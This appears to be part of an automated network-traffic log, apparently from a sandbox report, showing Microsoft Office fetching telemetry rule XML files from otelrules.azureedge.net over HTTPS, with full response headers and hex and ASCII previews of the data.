                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:42 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1362
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                    x-ms-request-id: 4b09b00a-d01e-0028-11e9-297896000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120842Z-17c5cb586f6lxnvg801rcb3n8n00000006eg000000000tw3
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    138192.168.2.56050713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:42 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1399
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                    x-ms-request-id: 338a3e6d-c01e-0079-709c-27e51a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120842Z-16849878b78qwx7pmw9x5fub1c00000004gg00000000gh7m
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    139192.168.2.56050913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:42 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1425
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                    x-ms-request-id: 00d80357-401e-0048-04c7-270409000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120842Z-15b8d89586f6nn8zqg1h5suba800000001r000000000875z
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    140192.168.2.56051013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:43 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1388
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                                    x-ms-request-id: a285717e-d01e-008e-03fa-28387a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120843Z-r197bdfb6b4bq7nf8dgr5rzeq400000001sg000000007pcm
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    141192.168.2.56051113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:43 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1415
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                                    x-ms-request-id: 6afd71f5-301e-003f-7d9e-26266f000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120843Z-16849878b78p8hrf1se7fucxk8000000079g00000000e7rn
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    142192.168.2.56051313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:43 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1378
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                                    x-ms-request-id: c032846d-701e-005c-2d58-27bb94000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120843Z-16849878b78smng4k6nq15r6s4000000083g0000000025vg
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    143192.168.2.56051513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:43 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1368
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                                    x-ms-request-id: 48a66efd-001e-00a2-625d-26d4d5000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120843Z-r197bdfb6b4d9xksru4x6qbqr000000006h0000000006eee
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    144192.168.2.56051413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:43 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1405
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                                    x-ms-request-id: 09556753-901e-0064-11fd-26e8a6000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120843Z-r197bdfb6b4grkz4xgvkar0zcs00000005zg00000000byts
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:43 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    145192.168.2.56051613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1415
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                                    x-ms-request-id: 30963bf2-701e-0001-2a98-28b110000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120844Z-15b8d89586fpccrmgpemqdqe5800000001fg000000000z26
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
